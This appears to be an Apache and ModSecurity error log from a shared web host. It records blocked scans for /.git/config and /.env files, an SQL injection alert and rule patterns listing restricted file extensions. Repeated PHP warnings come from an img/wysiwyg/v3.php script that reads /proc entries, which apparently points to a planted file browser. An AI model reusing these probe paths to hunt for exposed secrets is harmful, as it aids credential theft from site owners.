[Tue May 12 06:50:32.808171 2026] [core:error] [pid 1825179:tid 1825213] [client 98.80.16.166:27385] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:50:32.808198 2026] [core:error] [pid 1825179:tid 1825213] [client 98.80.16.166:27385] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:50:35.479478 2026] [security2:error] [pid 1842385:tid 1842396] [client 43.156.114.184:51302] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKxmxs7kySIUZ3ORnI9_AAAAQY"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://scarcity-value.com
[Tue May 12 06:50:51.525819 2026] [:error] [pid 1820198:tid 1820201] [client 217.182.73.60:47796] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 06:50:51.680562 2026] [:error] [pid 1825287:tid 1825317] [client 54.37.19.39:34420] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
PHP Warning:  filesize(): stat failed for /proc/103/task/103/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/103/task/103/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/103/task/103/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/103/task/103/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/103/task/103/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/103/task/103/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:52:40.794798 2026] [security2:error] [pid 1825179:tid 1825204] [client 43.165.7.132:35402] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agKyGNr1yOh9Tvizezi33wAAAEY"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899857/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899857/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899857/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899857/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899857/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899857/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:52:43.670962 2026] [security2:error] [pid 1844863:tid 1844892] [client 43.165.7.132:40616] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agKyG_aAnTZtx1_H_wzQnQAAAVc"], referer: http://www.jeanboyault.fr
[Tue May 12 06:52:45.802395 2026] [security2:error] [pid 1825287:tid 1825317] [client 43.130.34.74:47956] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/personnes/anne-laure-g-m/"] [unique_id "agKyHQgpmE1yW0glLdhGbAAAAMw"]
[Tue May 12 06:52:57.486332 2026] [security2:error] [pid 1842385:tid 1842414] [client 43.156.122.201:33290] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-mobilite-regional.com"] [uri "/"] [unique_id "agKyKRs7kySIUZ3ORnI-pwAAARc"]
[Tue May 12 06:53:02.220418 2026] [security2:error] [pid 1808852:tid 1808879] [client 43.156.122.201:33948] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKyLhfeipD4uoG21FpLJgAAABg"], referer: http://www.pole-mobilite-regional.com
[Tue May 12 06:53:09.044112 2026] [security2:error] [pid 1825179:tid 1825204] [client 43.156.122.201:42236] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKyNdr1yOh9Tvizezi3-QAAAEY"], referer: https://www.pole-de-mobilite-regional.com/
[Tue May 12 06:53:30.793007 2026] [authz_core:error] [pid 1825287:tid 1825326] [client 20.56.20.8:57885] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-content/uploads/wpcf7_uploads/, referer: binance.com
[Tue May 12 06:53:51.976653 2026] [security2:error] [pid 1808852:tid 1808873] [client 43.133.41.88:41412] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "maelbailly.fr"] [uri "/"] [unique_id "agKyXxfeipD4uoG21FpLWwAAABI"]
[Tue May 12 06:53:57.966197 2026] [security2:error] [pid 1825179:tid 1825216] [client 43.133.41.88:33846] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agKyZdr1yOh9Tvizezi4KwAAAFI"], referer: http://maelbailly.fr
[Tue May 12 06:54:59.060218 2026] [security2:error] [pid 1808852:tid 1808875] [client 114.119.134.48:56831] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d9a74c51e4325b984b26539624f781aa||1778563495||1778563135"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/service/machine-nespresso/"] [unique_id "agKyoxfeipD4uoG21FpLlgAAABQ"], referer: https://rentparadise.fr/service/linge-de-toilette
[Tue May 12 06:54:59.060441 2026] [security2:error] [pid 1808852:tid 1808875] [client 114.119.134.48:56831] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/service/machine-nespresso/"] [unique_id "agKyoxfeipD4uoG21FpLlgAAABQ"], referer: https://rentparadise.fr/service/linge-de-toilette
[Tue May 12 06:54:59.150511 2026] [authz_core:error] [pid 1842385:tid 1842394] [client 20.56.20.8:64276] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log, referer: binance.com
[Tue May 12 06:54:59.637872 2026] [security2:error] [pid 1808852:tid 1808875] [client 114.119.134.48:56831] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKyoxfeipD4uoG21FpLlgAAABQ"], referer: https://rentparadise.fr/service/linge-de-toilette
[Tue May 12 06:55:20.698189 2026] [authz_core:error] [pid 1820198:tid 1820217] [client 20.56.20.8:49457] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-admin/includes/error_log, referer: binance.com
[Tue May 12 06:55:28.150584 2026] [security2:error] [pid 1844863:tid 1844888] [client 52.200.93.170:45020] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/listoffreepornsites.com"] [unique_id "agKywPaAnTZtx1_H_wzRUwAAAVM"]
[Tue May 12 06:55:28.150946 2026] [security2:error] [pid 1844863:tid 1844888] [client 52.200.93.170:45020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/listoffreepornsites.com"] [unique_id "agKywPaAnTZtx1_H_wzRUwAAAVM"]
[Tue May 12 06:55:28.151169 2026] [security2:error] [pid 1844863:tid 1844888] [client 52.200.93.170:45020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/listoffreepornsites.com"] [unique_id "agKywPaAnTZtx1_H_wzRUwAAAVM"]
[Tue May 12 06:55:51.068408 2026] [core:error] [pid 1825179:tid 1825208] [client 66.249.77.39:44436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:55:51.068440 2026] [core:error] [pid 1825179:tid 1825208] [client 66.249.77.39:44436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:56:54.674565 2026] [security2:error] [pid 1825179:tid 1825206] [client 104.28.225.30:15654] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/config"] [unique_id "agKzFtr1yOh9Tvizezi4wAAAAEg"]
[Tue May 12 06:56:54.674780 2026] [security2:error] [pid 1825179:tid 1825206] [client 104.28.225.30:15654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/config"] [unique_id "agKzFtr1yOh9Tvizezi4wAAAAEg"]
[Tue May 12 06:56:54.770003 2026] [security2:error] [pid 1820198:tid 1820202] [client 104.28.225.30:15662] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.git/HEAD"] [unique_id "agKzFs1tk6y7yBJLpJpQGwAAAII"]
[Tue May 12 06:56:54.770221 2026] [security2:error] [pid 1820198:tid 1820202] [client 104.28.225.30:15662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.git/HEAD"] [unique_id "agKzFs1tk6y7yBJLpJpQGwAAAII"]
[Tue May 12 06:56:55.523042 2026] [security2:error] [pid 1825179:tid 1825206] [client 104.28.225.30:15654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKzFtr1yOh9Tvizezi4wAAAAEg"]
[Tue May 12 06:56:55.561765 2026] [security2:error] [pid 1820198:tid 1820202] [client 104.28.225.30:15662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKzFs1tk6y7yBJLpJpQGwAAAII"]
[Tue May 12 06:56:57.955346 2026] [security2:error] [pid 1825287:tid 1825312] [client 170.106.35.137:46470] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.culturesvoile.com"] [uri "/"] [unique_id "agKzGQgpmE1yW0glLdhHhgAAAMc"], referer: http://www.culturesvoile.com
[Tue May 12 06:57:35.563842 2026] [ssl:error] [pid 1820198:tid 1820202] (EAI 2)Name or service not known: [client 74.7.230.0:57180] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:57:35.563884 2026] [ssl:error] [pid 1820198:tid 1820202] AH01941: stapling_renew_response: responder error
[Tue May 12 06:57:40.379740 2026] [security2:error] [pid 1825179:tid 1825221] [client 85.121.126.213:49400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/public/.env"] [unique_id "agKzRNr1yOh9Tvizezi44gAAAFc"]
[Tue May 12 06:57:40.379985 2026] [security2:error] [pid 1825179:tid 1825221] [client 85.121.126.213:49400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/public/.env"] [unique_id "agKzRNr1yOh9Tvizezi44gAAAFc"]
[Tue May 12 06:57:40.380262 2026] [security2:error] [pid 1825179:tid 1825221] [client 85.121.126.213:49400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/public/.env"] [unique_id "agKzRNr1yOh9Tvizezi44gAAAFc"]
[Tue May 12 06:57:40.477260 2026] [security2:error] [pid 1825287:tid 1825323] [client 85.121.126.213:49328] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.backup"] [unique_id "agKzRAgpmE1yW0glLdhH3gAAANI"]
[Tue May 12 06:57:40.477508 2026] [security2:error] [pid 1825287:tid 1825323] [client 85.121.126.213:49328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.backup"] [unique_id "agKzRAgpmE1yW0glLdhH3gAAANI"]
[Tue May 12 06:57:40.477802 2026] [security2:error] [pid 1825287:tid 1825323] [client 85.121.126.213:49328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.backup"] [unique_id "agKzRAgpmE1yW0glLdhH3gAAANI"]
[Tue May 12 06:57:40.507532 2026] [security2:error] [pid 1825287:tid 1825318] [client 85.121.126.213:49466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/.env.local"] [unique_id "agKzRAgpmE1yW0glLdhH4AAAAM0"]
[Tue May 12 06:57:40.507695 2026] [security2:error] [pid 1825287:tid 1825318] [client 85.121.126.213:49466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/.env.local"] [unique_id "agKzRAgpmE1yW0glLdhH4AAAAM0"]
[Tue May 12 06:57:40.507938 2026] [security2:error] [pid 1825287:tid 1825318] [client 85.121.126.213:49466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/.env.local"] [unique_id "agKzRAgpmE1yW0glLdhH4AAAAM0"]
